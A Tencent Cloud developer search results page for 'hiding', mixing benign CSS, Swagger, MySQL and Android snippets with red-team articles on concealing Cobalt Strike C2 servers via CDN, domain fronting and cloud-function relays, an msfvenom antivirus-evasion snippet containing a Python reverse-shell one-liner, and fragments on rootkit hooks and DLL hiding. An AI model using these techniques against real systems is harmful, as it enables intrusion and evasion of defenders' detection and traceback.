- 综合排序
- 最热优先
- 最新优先
- 来自专栏红蓝对抗
流量加密之C2隐藏
所以我们需要加密流量保护CS服务器以免被防守方的安全监控检测出来甚至溯源我们的CS服务器,目前常用的隐藏手段包括域前置、CDN、云函数等,接下来我将介绍这几种常见的隐藏C2的方式。 因此我们可以通过云函数的特性来隐藏CS服务端。 CS 服务器定制 malleable C2 以用于隐藏流量。 可以发现我们的CS上又出现一台主机在微步云沙箱中可以清晰地看到请求域名为腾讯云域名同时IP地址为腾讯云的IDC服务器,而不是我们真正的CS服务器IP地址,说明CS服务器已成功隐藏。 ,就像CDN在设计之初主要用于保护网站的真实IP,但作为攻击者我们也可以使用它来保护我们的C2服务器;而使用OpenSSL生成的RSA证书除了身份验证以外也能够帮助攻击者加密流量、隐藏通信。
13.5K111编辑于 2022-06-21 - 来自专栏Khan安全团队
云函数隐藏C2爬坑记
启动云函数 * 在腾讯云控制台搜索云函数,在函数服务->函数管理进行新建->自定义 image.png // **坑点一:**要根据cs监听类型http/https在脚本内填入c2服务器地址 ``` py3代码 # -*- coding: utf8 -*- import json,requests,base64 def main_handler(event, context): C2='http ://<C2服务器地址>' # 这里可以使用 HTTP、HTTPS~下角标~ path=event['path'] headers=event['headers'] print(event) if * 这儿没做cs马的免杀,关了defender(被干的太惨了),选择https的监听方式,直接上线,sleep调到0发现监听ip会一直变动,配置生效 image.png ## * 总结 * 云函数隐藏 C2原理 马 -> 腾讯云函数api -> py函数 -> CS服务端 CS马被执行后,流量直接走向腾讯云的api(也就是这一步达成了隐藏C2服务端的目的,腾讯地址,有腾讯的CDN),然后py函数会根据传入的流量作为中间人对
2.6K30编辑于 2022-01-05 - 来自专栏技术杂记
如何隐藏钩子:rootkit 的管理程序2
2. 两种分配的内存地址都是高度可预测的。 随机 2 个字节) 712da25b mov eax,dword ptr [ecx] ; ptr2 -> ptr3 (eax) 712da25d 调用 dword ptr [eax] ; ptr3 别的 intArr[i] = 0x3c3c3c3c;// 否则,ptr1 } // part2: ptr2 读取 页面大小的图案就足够了 因为我们只想泄漏大约 2 个字节的堆栈地址。 2.接下来,我们根据喷射循环计数器计算所有模式值 如下: i_pattern = i*4%0x1000; 3. 11b3dfe4 04e04c2c ; 看起来不错: 0:007> dds 04e04c2c 04e04c2c 6f6e44b8 msxml6!
4.9K480编辑于 2022-03-21 C#tablecontrol隐藏标题2种方法
ItemSize : Width=0;Height=1;//Height好象不能设为0,但也就那么一丁点儿,不影响
17510编辑于 2025-07-18- 来自专栏狼组安全团队
低成本隐藏加速你的C2
果然没错,根据HOST头进行定位,那么这样就可以按照CDN上线的方式进行配置监听: 生成一下CS马子并且执行: 执行一下命令: 在微步中看看分析: 看看转发的监听: 完美隐藏 当然你甚至还可以把C2管理端口使用不同工具映射出来。。。。 开源地址:https://github.com/SpringHgui/FastTunnel 后记 后面大家可以尝试一些新的东西,比如我自己想到: 利用 proxychains4 对你出口的流量进行隐藏
1.4K10发布于 2021-03-01 - 来自专栏Ms08067安全实验室
手把手教你如何隐藏C2
文章来源|MS08067 公众号读者投稿 本文作者:下次一定(白嫖知识星球活动) CDN技术隐藏C2 原理 让cdn转发合法的http或者https流量来达到隐藏的目的。 技术实现重点: 一个不备案的域名,否则这个方式毫无用处 这种技术对http与https没有强制要求,都可以使用,而域前置技术要求是https 域前置技术隐藏C2 原理 域前置技术就是通过CDN节点将流量转发到真实的 可达到的效果:通过一个高信任域名隐藏自己的真实域名与ip,且受害主机上的流量只有跟cdn通信的,不会有跟真实c2的。 技术实现重点 需要基于https 需要知道cdn上的其他高信誉域名或者ip 需要修改malleable profile文件 重定向技术隐藏C2 原理 总的来说就是得有两台vps,一台做重定向,一台是真正的 从技术上来说: cdn技术仅仅利用了cdn对http与https流量进行转发来达到的隐匿效果,可以隐藏ip不能隐藏域名。
2.7K20发布于 2021-06-16 - 来自专栏韩曙亮的移动开发专栏
【CSS】元素显示与隐藏 ( display 隐藏对象 | visibility 隐藏对象 | overflow 隐藏对象 )
一、元素的显示与隐藏 ---- 在开发中 , 经常需要使用到 元素的显示 与 隐藏 , 默认状态下 , 按钮下面没有任何内容 ; 将鼠标移动到 红色按钮 后 , 显示一个对话框布局 ; 控制 元素的 显示 与 隐藏 的样式有如下三种 : display visibility overflow 二、display 隐藏对象 ---- 1、display 隐藏对象语法说明 为标签元素设置 display: none 可以 隐藏该元素 ; 如果想要 显示该对象 , 为该元素设置 display: block 即可 ; 2、display 显示元素代码示例 设置 display: block , 子元素也同时不可见 ; visibility 设置属性值 visible , 表示该元素是可见的 ; visibility 设置属性值 hidden , 表示该元素是隐藏的 ; 2、visibility ---- 1、overflow 隐藏对象语法说明 overflow 只能对超出部分隐藏代码 ; overflow 可设置的值 : visible : 子元素超出父容器的部分仍然显示 ; hidden
8.2K30编辑于 2023-04-16 - 来自专栏HACK学习
实战填坑 | CS使用CDN隐藏C2
但在搭建域名+CDN隐藏版c2时楼主遇到了不少的坑,在这里顺着搭建的思路慢慢把踩的坑填上。 2.服务器特征配置 2.1隐藏服务器:CDN加速 在cloudflarr注册域名后,将NS记录指向alice.ns.cloudflare.com和chase.ns.cloudflare.com即可选择使用 2.2隐藏流量特征:profile Malleable C2 profile作为CS的配置文件,可以配置通信流量的特征,用来隐藏自己的行踪,以Malleable-C2-Profiles为例: https ://github.com/rsmudge/Malleable-C2-Profiles 官方参考地址: https://www.cobaltstrike.com/help-malleable-c2 填坑 使用cloudflare隐藏c2还要设置profile中的head的mime-type,具体为:需要在http-config将头设置为header "Content-Type" "application
5.5K20发布于 2021-06-24 - 来自专栏吟风者
swagger2自定义隐藏实体类属性
假如接收参数的实体类中关联了其他对象,那么swagger2的页面中参数应该会多出来这些,dept.id,dept.deptName,或者集合属性,roles[0].id,roles[0].roleName image 笔者在swagger2提供的配置中没有找到隐藏此类参数的设置 但是通过阅读源码找到了展开参数的类springfox.documentation.spring.web.readers.parameter.ModelAttributeParameterExpander ,笔者通过继承这个类,并添加@Primary注解覆盖了源码中的逻辑,修改了getBeanPropertyNames方法,其他不变 swagger2版本2.8.0 解决方案 package com.example.swagger ApiModelProperty(value = "角色信息") @IgnoreSwaggerParameter private List<Role> roles; } 这样就可以自定义隐藏 swagger2页面中的参数了。
9.4K40发布于 2019-07-25 - 来自专栏HACK学习
实战填坑 | 隐藏C2域名地址技巧
哈,恭喜你你肯定被盯上了~ 开个玩笑,话说现在隐藏c2真实地址的手段层出不穷,笔者参考了网上众多隐藏技巧,经过一定的钻研写下了这篇主要隐藏域名的几个思路,但和域前置、云函数技术不同,域前置技术原理: 假设有两个主机 三、匿名CDN & worker 有老哥问了,要是多个c2,还有域名、c2的ip在国内使用,怎么办? 然后重点来了,我的目的并不是把cmd.winupdateck.top作为c2 handler,参考上个思路,新建worker,把cmd.winupdateck.top再隐藏在worker之后: let 未满足我的过滤条件,访问默认nginx为正常页面,设置我的过滤规则后,例如UA、Host,在c2中可看到访问信息: ? 2heroku有用户协议,如果不慎会被封号。 优点:地址黑了可以直接删了app重建一个。 五、总结 以上几个思路其实结合起来并不难,无非就是域名身后单纯CDN可隐藏ip,域名黑了再申一个。
7.5K10发布于 2021-06-24 - 来自专栏Ms08067安全实验室
远控免杀专题文章(2)-msfvenom隐藏的参数
(2)使用-p指定使用的攻击载荷模块,使用-e指定使用x86/shikata_ga_nai编码器,使用-f选项告诉MSF编码器输出格式为exe,-o选项指定输出的文件名为payload.exe,保存在根目录下 subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.211.55.2",3333));os.dup2( s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
2.3K10发布于 2020-02-19 - 来自专栏Android理论
APK的更新、安装、隐藏、解除隐藏
android.intent.action.PACKAGE_REPLACED 且 intent.getBooleanExtra(Intent.EXTRA_REPLACING, false) 获取的值为true Android 监听多用户切换,隐藏和禁用指定 hideOtherBrandAppWhenUserSwitched(); } }); } } }; mContext.registerReceiver(mUserSwitchedReceiver, filter); 是否隐藏和禁用 exeption) { Slog.w(TAG, "enableApplication error:" + exeption.getMessage()); } } 隐藏的 // disable应用时,若传入此参数,则应用在桌面没有图标,且在设置界面、应用程序列表里面也没有图标 (应用完全隐藏了) public static final int COMPONENT_ENABLED_STATE_DISABLED_USER = 3; // disable应用时,若传入此参数,则应用在桌面没有图标,但是在设置界面、应用程序列表里面有图标 (只是桌面图标隐藏了,设置里面仍可以看到图标,用户可以再次enable此应用) 另外
3.4K50编辑于 2021-12-13 - 来自专栏开发日志
CSS 文本超出2行就隐藏且显示省略号
css定义 overflow : hidden; text-overflow: ellipsis; display: -webkit-box; -webkit-line-clamp: 2; -webkit-box-orient -webkit-box-orient:vertical; //从上到下垂直排列子元素(设置伸缩盒子的子元素排列方式) -webkit-line-clamp:2; //这个属性不是css的规范属性 项目是使用less 会发现但在less中添加这些时并没有生效,依然是显示多行 -webkit-line-clamp: 2,在less中不生效
2.7K60编辑于 2022-04-22 - 来自专栏小狐狸说事
7b2美化-隐藏页眉菜单美化社交类型菜单
7b2美化-隐藏页眉菜单美化社交类型菜单 ---- 示例请查看b2演示站 1、设置顶部菜单样式 设置项在:B2主题设置 – 模块管理 – 顶部 – 顶部布局样式-社交类型菜单 注意;如果你选择的是其他样式的菜单 2、添加css样式 请将以下css代码复制到你自己的css中。 .site .site-header-in{ box-shadow: none; } .site .site-header-in > div:last-child{ box-shadow: 0px 2px
1.2K40编辑于 2022-11-16 - 来自专栏Live专区
信息隐藏拓展压缩包隐藏图片里面
提示:这样就完成了 打开图片正常显示 图片存储内存加大 修改为你添加的压缩格式 即可打开压缩包里的内容
1.2K10编辑于 2022-08-16 - 来自专栏逆向技术
Win32之隐藏DLL隐藏模块技术
Win32之隐藏DLL隐藏模块技术 这一讲涉及到windows底层技术.跟汇编内容. 我们才可以实现模块隐藏(也称为DLL隐藏) 一丶API反汇编勾引兴趣 我们都用过Windows的进程跟线程API 也就是 GetCurrentThreadId() 跟 GetCurrentProcessId 实现一个模块隐藏很简单.难的就是上面的结构.我们必须要熟悉.偏移要知道.我们才可以做到模块隐藏. 具体代码我会放到下面. 然后讲解代码. "成功隐藏\r\n"); system("pause"); return 0; } 上面是我们隐藏ntdll.看一下没有隐藏的时候 ? 隐藏一下ntdll看下. ?
4.1K60发布于 2019-05-25 - 来自专栏AustinDatabases
MYSQL 性能优化 index 函数,隐藏,前缀,hash 索引 使用方法(2)
OK, 1 row affected (0.01 sec) mysql> insert into prefix_test (name,type_comments) values ('Semon','2_ 在这些过后就是MYSQL 的隐藏索引,这个并不是一个新的功能,在其他数据库也有类似的索引类型,实际上隐藏索引是针对某些查询来验证索引的有效性,并且让他上线或者下线的功能。 mysql> alter table hash_test add hash_col varchar(20) generated always as (crc32(concat(type1,type2)) -------+-------+------------+ 1 row in set (0.00 sec) mysql> insert into hash_test (name,type1,type2) | Sam | 20 | 30 | 2378129210 | +----+------+-------+-------+------------+ 2 rows in set (0.00
74420编辑于 2022-07-13 - 来自专栏jiajia_deng
右键添加隐藏或显示系统隐藏文件
我不喜欢长期显示着隐藏文件,这样看着目录结构比较乱,所以平时用的时候都是隐藏,而有的时候需要看一些隐藏的目录里面的内容,又需要显示出来,这样操作比较麻烦,所以在右键添加上 显示/隐藏 系统隐藏文件 功能 在网上搜索了一些方法,下面是最靠谱的,只不过他是显示隐藏文件拓展名,我稍微修改了一下,成了显示和隐藏系统隐藏文件功能。 新建右键菜单注册表 Windows Registry Editor Version 5.00 [HKEY_CLASSES_ROOT\*\shell\DisplayFile] @="显示/隐藏 系统隐藏文件 \\SuperHidden.vbs" [HKEY_CLASSES_ROOT\Folder\shell\DisplayFile] @="显示/隐藏 系统隐藏文件" [HKEY_CLASSES_ROOT \\SuperHidden.vbs" 导入这个注册表以后,在系统的各个位置右键就都能看到显示和隐藏系统隐藏文件的邮件菜单了。
2.3K60编辑于 2023-10-21 - 来自专栏铭心の博客
隐藏的网站
hosts访问Web Server的流程图如下所示: 具体的搭建方法如下 私有DNS: 1、公网服务器搭建网站并绑定域名,如:公网服务器IP为1.2.3.4 绑定的域名为:a.b.com 2、 本地HOSTS: 1、公网服务器搭建网站并绑定域名,如:公网服务器IP为1.2.3.4 绑定的域名为:a.b.com 2、设置本地hosts的映射关系为1.2.3.4 a.b.com并保存(hosts 本机hosts访问Web Server的流程图如下所示: 具体的搭建方法如下 私有DNS: 1.公网服务器搭建网站并绑定域名,如:公网服务器IP为1.2.3.4 绑定的域名为:a.b.com 2. 本地HOSTS: 1.公网服务器搭建网站并绑定域名,如:公网服务器IP为1.2.3.4 绑定的域名为:a.b.com 2.设置本地hosts的映射关系为1.2.3.4 a.b.com并保存(hosts 即可访问到本站搭建的论坛 方法二(私有dns) 1.私有dns添加dns重写规则,规则为101.32.40.226 bbs.mxin.co 2.浏览器访问bbs.mxin.co即可访问到本站搭建的论坛
57900编辑于 2024-12-20 - 来自专栏狼组安全团队
为你的C2配置一个完美的隐藏
5min 附件/链接:点击查看原文下载 声明:请勿用作违法用途,否则后果自负 本文属于WgpSec原创奖励计划,未经许可禁止转载 前言 距离上次更新差不多快一个月了,在HVV结束,总结的时候,红队的一个c2隐藏技术我觉的非常不错 一、 原理 在配置之前我们需要了解一下域前置的技术,简单的来说就是通过CDN节点将流量转发到真实的C2服务器,因为CDN节点ip是通过识别请求的Host头进行流量转,利用我们配置域名的高可信度,比如微软谷歌等 ,可以有效的躲避DLP,agent等流量监测,这样就起到了一个隐藏的作用。 :配置文件下载,我们下载完成后,需要把所有的域名转换为我们设置的CDN域名: 服务端运行: 然后我们在C2上监听我们的端口,我的运行在8080端口上: 在日中我们可以看到对应的请求信息。 然后在使用对应的监听生成C2的木马: 成功上线,我们在本地查看对应的端口,看看能不能找到我们的信息 ok搞定
3K40发布于 2021-02-04
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号